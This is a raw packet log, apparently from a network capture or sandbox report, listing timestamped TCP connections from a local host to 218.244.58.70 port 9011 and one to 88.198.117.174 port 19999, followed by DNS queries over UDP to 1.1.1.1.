Jun 14, 2024 16:42:37.369294882 CEST	9011	52080	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:37.375914097 CEST	52080	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:37.380661964 CEST	9011	52080	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:37.395770073 CEST	52080	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:37.400645971 CEST	9011	52080	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:37.427829027 CEST	52080	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:37.439569950 CEST	9011	52080	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:37.444950104 CEST	52080	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:37.450746059 CEST	9011	52080	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:37.472240925 CEST	52080	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:37.477025032 CEST	9011	52080	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:37.486829042 CEST	52080	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:37.491621971 CEST	9011	52080	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:37.502815008 CEST	52080	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:37.507734060 CEST	9011	52080	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:37.525516033 CEST	52080	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:37.530421019 CEST	9011	52080	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:37.546737909 CEST	52080	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:37.551491022 CEST	9011	52080	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:37.578226089 CEST	52080	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:37.583049059 CEST	9011	52080	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:37.597278118 CEST	52080	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:37.611342907 CEST	9011	52080	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:37.635761023 CEST	52080	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:37.640855074 CEST	9011	52080	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:37.649897099 CEST	52080	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:37.657222033 CEST	9011	52080	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:37.663640976 CEST	52080	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:37.675297976 CEST	9011	52080	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:37.708355904 CEST	52080	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:37.715888023 CEST	9011	52080	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:37.726382971 CEST	52080	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:37.731595993 CEST	9011	52080	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:37.745846033 CEST	52080	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:37.769340992 CEST	9011	52080	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:37.769397020 CEST	52080	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:37.774478912 CEST	9011	52080	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:37.780296087 CEST	52080	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:37.785537004 CEST	9011	52080	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:37.808157921 CEST	52080	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:37.813463926 CEST	9011	52080	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:37.818650007 CEST	9011	52080	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:37.819011927 CEST	52080	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:37.894171000 CEST	52080	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:42.858675003 CEST	52081	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:42.863579035 CEST	9011	52081	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:42.863651037 CEST	52081	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:42.864651918 CEST	52081	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:42.869468927 CEST	9011	52081	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:42.884797096 CEST	52081	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:42.889653921 CEST	9011	52081	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:42.900228977 CEST	52081	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:42.905587912 CEST	9011	52081	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:42.932852983 CEST	52081	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:42.937675953 CEST	9011	52081	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:43.021419048 CEST	52081	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:43.027084112 CEST	9011	52081	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:43.050543070 CEST	52081	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:43.055308104 CEST	9011	52081	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:43.064969063 CEST	52081	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:43.070007086 CEST	9011	52081	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:43.083843946 CEST	52081	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:43.088671923 CEST	9011	52081	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:43.119679928 CEST	52081	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:43.124516010 CEST	9011	52081	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:43.132556915 CEST	52081	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:43.137351990 CEST	9011	52081	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:43.149405956 CEST	52081	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:43.154443026 CEST	9011	52081	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:43.185580015 CEST	52081	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:43.190460920 CEST	9011	52081	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:43.210503101 CEST	52081	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:43.215362072 CEST	9011	52081	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:43.231287956 CEST	52081	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:43.236124992 CEST	9011	52081	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:43.263988972 CEST	52081	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:43.269865036 CEST	9011	52081	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:43.285103083 CEST	52081	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:43.290015936 CEST	9011	52081	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:43.300786972 CEST	52081	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:43.306102991 CEST	9011	52081	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:43.317550898 CEST	52081	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:43.322302103 CEST	9011	52081	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:43.343966961 CEST	52081	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:43.348753929 CEST	9011	52081	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:43.361227989 CEST	52081	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:43.367085934 CEST	9011	52081	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:43.381891012 CEST	52081	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:43.387747049 CEST	9011	52081	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:43.397264004 CEST	52081	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:43.405380964 CEST	9011	52081	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:43.442014933 CEST	52081	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:43.447036028 CEST	9011	52081	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:43.466420889 CEST	52081	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:43.472412109 CEST	9011	52081	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:43.505949020 CEST	52081	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:43.510780096 CEST	9011	52081	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:43.533132076 CEST	52081	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:43.537986994 CEST	9011	52081	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:43.553467989 CEST	52081	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:43.558729887 CEST	9011	52081	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:43.566493034 CEST	52081	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:43.569757938 CEST	9011	52081	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:43.569823027 CEST	52081	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:43.569885015 CEST	52081	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:43.571738958 CEST	9011	52081	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:43.574749947 CEST	9011	52081	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:43.575146914 CEST	9011	52081	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:48.623593092 CEST	52082	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:48.628412962 CEST	9011	52082	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:48.628513098 CEST	52082	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:48.629149914 CEST	52082	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:48.634468079 CEST	9011	52082	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:48.651623964 CEST	52082	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:48.656451941 CEST	9011	52082	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:48.667114973 CEST	52082	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:48.672576904 CEST	9011	52082	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:48.697813988 CEST	52082	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:48.703097105 CEST	9011	52082	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:48.707833052 CEST	52082	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:48.712968111 CEST	9011	52082	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:48.727133036 CEST	52082	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:48.731962919 CEST	9011	52082	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:48.750740051 CEST	52082	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:48.755642891 CEST	9011	52082	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:48.801655054 CEST	52082	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:48.806468010 CEST	9011	52082	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:48.821517944 CEST	52082	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:48.826787949 CEST	9011	52082	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:48.861984015 CEST	52082	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:48.866885900 CEST	9011	52082	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:48.931215048 CEST	52082	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:48.936080933 CEST	9011	52082	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:48.954154015 CEST	52082	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:48.959216118 CEST	9011	52082	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:48.971424103 CEST	52082	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:48.976227999 CEST	9011	52082	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:48.992640972 CEST	52082	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:48.997456074 CEST	9011	52082	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:49.039381981 CEST	52082	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:49.044142962 CEST	9011	52082	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:49.089795113 CEST	52082	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:49.094791889 CEST	9011	52082	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:49.133606911 CEST	52082	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:49.138423920 CEST	9011	52082	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:49.201571941 CEST	52082	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:49.206373930 CEST	9011	52082	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:49.263521910 CEST	52082	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:49.268316031 CEST	9011	52082	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:49.281523943 CEST	52082	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:49.286523104 CEST	9011	52082	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:49.311733007 CEST	52082	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:49.317481041 CEST	9011	52082	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:49.334598064 CEST	9011	52082	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:49.334656954 CEST	52082	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:49.385900974 CEST	52082	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:54.455828905 CEST	52083	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:54.460949898 CEST	9011	52083	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:54.461056948 CEST	52083	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:54.461735964 CEST	52083	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:54.466826916 CEST	9011	52083	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:54.467879057 CEST	52083	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:54.475013971 CEST	9011	52083	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:54.480294943 CEST	52083	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:54.485158920 CEST	9011	52083	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:54.504316092 CEST	52083	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:54.510555029 CEST	9011	52083	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:54.537875891 CEST	52083	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:54.543193102 CEST	9011	52083	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:54.568105936 CEST	52083	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:54.573263884 CEST	9011	52083	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:54.591084003 CEST	52083	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:54.596631050 CEST	9011	52083	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:54.700778961 CEST	52083	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:54.706036091 CEST	9011	52083	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:54.749763012 CEST	52083	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:54.755163908 CEST	9011	52083	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:54.781785965 CEST	52083	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:54.786838055 CEST	9011	52083	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:54.842142105 CEST	52083	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:54.847234011 CEST	9011	52083	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:54.868525982 CEST	52083	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:54.873768091 CEST	9011	52083	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:54.923424959 CEST	52083	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:54.930469990 CEST	9011	52083	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:54.949239016 CEST	52083	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:54.957195044 CEST	9011	52083	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:54.972662926 CEST	52083	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:54.981216908 CEST	9011	52083	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:54.999516010 CEST	52083	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:55.006576061 CEST	9011	52083	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:55.043184996 CEST	52083	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:55.054716110 CEST	9011	52083	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:55.109776974 CEST	52083	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:55.117582083 CEST	9011	52083	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:55.156054974 CEST	52083	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:55.163427114 CEST	9011	52083	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:55.171149969 CEST	9011	52083	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:55.171308994 CEST	52083	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:55.195497036 CEST	52083	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:43:00.225951910 CEST	52084	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:43:00.231125116 CEST	9011	52084	218.244.58.70	192.168.2.5
Jun 14, 2024 16:43:00.231206894 CEST	52084	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:43:00.231831074 CEST	52084	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:43:00.236619949 CEST	9011	52084	218.244.58.70	192.168.2.5
Jun 14, 2024 16:43:00.262183905 CEST	52084	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:43:00.267119884 CEST	9011	52084	218.244.58.70	192.168.2.5
Jun 14, 2024 16:43:00.303062916 CEST	52084	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:43:00.308067083 CEST	9011	52084	218.244.58.70	192.168.2.5
Jun 14, 2024 16:43:00.349845886 CEST	52084	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:43:00.354641914 CEST	9011	52084	218.244.58.70	192.168.2.5
Jun 14, 2024 16:43:00.394099951 CEST	52084	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:43:00.399014950 CEST	9011	52084	218.244.58.70	192.168.2.5
Jun 14, 2024 16:43:00.424434900 CEST	52084	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:43:00.429317951 CEST	9011	52084	218.244.58.70	192.168.2.5
Jun 14, 2024 16:43:00.443820953 CEST	52084	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:43:00.448626995 CEST	9011	52084	218.244.58.70	192.168.2.5
Jun 14, 2024 16:43:00.462001085 CEST	52084	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:43:00.466953993 CEST	9011	52084	218.244.58.70	192.168.2.5
Jun 14, 2024 16:43:00.476116896 CEST	52084	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:43:00.480834961 CEST	9011	52084	218.244.58.70	192.168.2.5
Jun 14, 2024 16:43:00.518594980 CEST	52084	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:43:00.523519993 CEST	9011	52084	218.244.58.70	192.168.2.5
Jun 14, 2024 16:43:00.548100948 CEST	52084	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:43:00.556699991 CEST	9011	52084	218.244.58.70	192.168.2.5
Jun 14, 2024 16:43:00.562927961 CEST	52084	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:43:00.570410967 CEST	9011	52084	218.244.58.70	192.168.2.5
Jun 14, 2024 16:43:00.583092928 CEST	52084	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:43:00.587850094 CEST	9011	52084	218.244.58.70	192.168.2.5
Jun 14, 2024 16:43:00.633574009 CEST	52084	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:43:00.641299963 CEST	9011	52084	218.244.58.70	192.168.2.5
Jun 14, 2024 16:43:00.696563005 CEST	52084	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:43:00.703942060 CEST	9011	52084	218.244.58.70	192.168.2.5
Jun 14, 2024 16:43:00.916807890 CEST	52084	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:43:00.921674013 CEST	9011	52084	218.244.58.70	192.168.2.5
Jun 14, 2024 16:43:00.928713083 CEST	9011	52084	218.244.58.70	192.168.2.5
Jun 14, 2024 16:43:00.928792000 CEST	52084	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:43:01.144197941 CEST	52084	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:43:06.027731895 CEST	52085	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:43:06.032649994 CEST	9011	52085	218.244.58.70	192.168.2.5
Jun 14, 2024 16:43:06.032722950 CEST	52085	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:43:06.033309937 CEST	52085	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:43:06.038084030 CEST	9011	52085	218.244.58.70	192.168.2.5
Jun 14, 2024 16:43:06.072359085 CEST	52085	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:43:06.077171087 CEST	9011	52085	218.244.58.70	192.168.2.5
Jun 14, 2024 16:43:06.091866970 CEST	52085	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:43:06.096662045 CEST	9011	52085	218.244.58.70	192.168.2.5
Jun 14, 2024 16:43:06.105946064 CEST	52085	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:43:06.110702991 CEST	9011	52085	218.244.58.70	192.168.2.5
Jun 14, 2024 16:43:06.130691051 CEST	52085	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:43:06.135456085 CEST	9011	52085	218.244.58.70	192.168.2.5
Jun 14, 2024 16:43:06.158677101 CEST	52085	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:43:06.163502932 CEST	9011	52085	218.244.58.70	192.168.2.5
Jun 14, 2024 16:43:06.194492102 CEST	52085	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:43:06.199356079 CEST	9011	52085	218.244.58.70	192.168.2.5
Jun 14, 2024 16:43:06.211668968 CEST	52085	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:43:06.219265938 CEST	9011	52085	218.244.58.70	192.168.2.5
Jun 14, 2024 16:43:06.230776072 CEST	52085	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:43:06.235707045 CEST	9011	52085	218.244.58.70	192.168.2.5
Jun 14, 2024 16:43:06.255455017 CEST	52085	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:43:06.260164976 CEST	9011	52085	218.244.58.70	192.168.2.5
Jun 14, 2024 16:43:06.294249058 CEST	52085	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:43:06.299084902 CEST	9011	52085	218.244.58.70	192.168.2.5
Jun 14, 2024 16:43:06.463237047 CEST	52085	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:43:06.469801903 CEST	9011	52085	218.244.58.70	192.168.2.5
Jun 14, 2024 16:43:06.740454912 CEST	9011	52085	218.244.58.70	192.168.2.5
Jun 14, 2024 16:43:06.740535975 CEST	52085	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:43:07.031239986 CEST	52085	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:43:07.290920019 CEST	52086	19999	192.168.2.5	88.198.117.174
Jun 14, 2024 16:43:07.296070099 CEST	19999	52086	88.198.117.174	192.168.2.5
Jun 14, 2024 16:43:07.296233892 CEST	52086	19999	192.168.2.5	88.198.117.174
Jun 14, 2024 16:43:07.296233892 CEST	52086	19999	192.168.2.5	88.198.117.174
Jun 14, 2024 16:43:07.301304102 CEST	19999	52086	88.198.117.174	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 14, 2024 16:39:00.433983088 CEST	60029	53	192.168.2.5	1.1.1.1
Jun 14, 2024 16:39:00.571789026 CEST	53	60029	1.1.1.1	192.168.2.5
Jun 14, 2024 16:39:05.895528078 CEST	62983	53	192.168.2.5	1.1.1.1
Jun 14, 2024 16:39:05.905776024 CEST	53	62983	1.1.1.1	192.168.2.5
Jun 14, 2024 16:39:06.661930084 CEST	51522	53	192.168.2.5	1.1.1.1
Jun 14, 2024 16:39:06.687159061 CEST	53	51522	1.1.1.1	192.168.2.5
Jun 14, 2024 16:39:09.546266079 CEST	54877	53	192.168.2.5	1.1.1.1
Jun 14, 2024 16:39:09.556647062 CEST	53	54877	1.1.1.1	192.168.2.5
Jun 14, 2024 16:39:11.556313992 CEST	61031	53	192.168.2.5	1.1.1.1
Jun 14, 2024 16:39:11.887336016 CEST	53	61031	1.1.1.1	192.168.2.5
Jun 14, 2024 16:39:12.459299088 CEST	54644	53	192.168.2.5	1.1.1.1
Jun 14, 2024 16:39:12.486917973 CEST	53	54644	1.1.1.1	192.168.2.5
Jun 14, 2024 16:39:13.008563995 CEST	59282	53	192.168.2.5	1.1.1.1
Jun 14, 2024 16:39:13.017398119 CEST	53	59282	1.1.1.1	192.168.2.5
Jun 14, 2024 16:39:15.485945940 CEST	53527	53	192.168.2.5	1.1.1.1
Jun 14, 2024 16:39:15.815675974 CEST	53	53527	1.1.1.1	192.168.2.5
Jun 14, 2024 16:39:18.233339071 CEST	62206	53	192.168.2.5	1.1.1.1
Jun 14, 2024 16:39:18.256098032 CEST	53	62206	1.1.1.1	192.168.2.5
Jun 14, 2024 16:39:21.375439882 CEST	63889	53	192.168.2.5	1.1.1.1
Jun 14, 2024 16:39:21.385143042 CEST	53	63889	1.1.1.1	192.168.2.5
Jun 14, 2024 16:39:23.595870018 CEST	61470	53	192.168.2.5	1.1.1.1
Jun 14, 2024 16:39:23.605611086 CEST	53	61470	1.1.1.1	192.168.2.5
Jun 14, 2024 16:39:23.986196995 CEST	57793	53	192.168.2.5	1.1.1.1
Jun 14, 2024 16:39:24.019016981 CEST	53	57793	1.1.1.1	192.168.2.5
Jun 14, 2024 16:39:24.975043058 CEST	49797	53	192.168.2.5	1.1.1.1
Jun 14, 2024 16:39:25.069993019 CEST	53	49797	1.1.1.1	192.168.2.5
Jun 14, 2024 16:39:27.528614044 CEST	56659	53	192.168.2.5	1.1.1.1
Jun 14, 2024 16:39:27.536391973 CEST	53	56659	1.1.1.1	192.168.2.5
Jun 14, 2024 16:39:29.733918905 CEST	60466	53	192.168.2.5	1.1.1.1
Jun 14, 2024 16:39:29.900546074 CEST	53	60466	1.1.1.1	192.168.2.5
Jun 14, 2024 16:39:34.454636097 CEST	53325	53	192.168.2.5	1.1.1.1
Jun 14, 2024 16:39:34.464759111 CEST	53	53325	1.1.1.1	192.168.2.5
Jun 14, 2024 16:39:35.608994961 CEST	53534	53	192.168.2.5	1.1.1.1
Jun 14, 2024 16:39:35.634603024 CEST	53	53534	1.1.1.1	192.168.2.5
Jun 14, 2024 16:39:37.972758055 CEST	58287	53	192.168.2.5	1.1.1.1
Jun 14, 2024 16:39:37.980912924 CEST	53	58287	1.1.1.1	192.168.2.5
Jun 14, 2024 16:39:38.147275925 CEST	65274	53	192.168.2.5	1.1.1.1
Jun 14, 2024 16:39:38.157069921 CEST	53	65274	1.1.1.1	192.168.2.5
Jun 14, 2024 16:39:39.242047071 CEST	54188	53	192.168.2.5	1.1.1.1
Jun 14, 2024 16:39:39.251591921 CEST	53	54188	1.1.1.1	192.168.2.5
Jun 14, 2024 16:39:40.399857044 CEST	61085	53	192.168.2.5	1.1.1.1
Jun 14, 2024 16:39:40.409558058 CEST	53	61085	1.1.1.1	192.168.2.5
Jun 14, 2024 16:39:41.360898972 CEST	62076	53	192.168.2.5	1.1.1.1
Jun 14, 2024 16:39:41.388345957 CEST	53	62076	1.1.1.1	192.168.2.5
Jun 14, 2024 16:39:42.439842939 CEST	60612	53	192.168.2.5	1.1.1.1
Jun 14, 2024 16:39:42.449311972 CEST	53	60612	1.1.1.1	192.168.2.5
Jun 14, 2024 16:39:44.038427114 CEST	52049	53	192.168.2.5	1.1.1.1
Jun 14, 2024 16:39:44.046514988 CEST	53	52049	1.1.1.1	192.168.2.5
Jun 14, 2024 16:39:44.650044918 CEST	63152	53	192.168.2.5	1.1.1.1
Jun 14, 2024 16:39:44.660337925 CEST	53	63152	1.1.1.1	192.168.2.5
Jun 14, 2024 16:39:45.449505091 CEST	62386	53	192.168.2.5	1.1.1.1
Jun 14, 2024 16:39:45.460346937 CEST	53	62386	1.1.1.1	192.168.2.5
Jun 14, 2024 16:39:47.110012054 CEST	54563	53	192.168.2.5	1.1.1.1
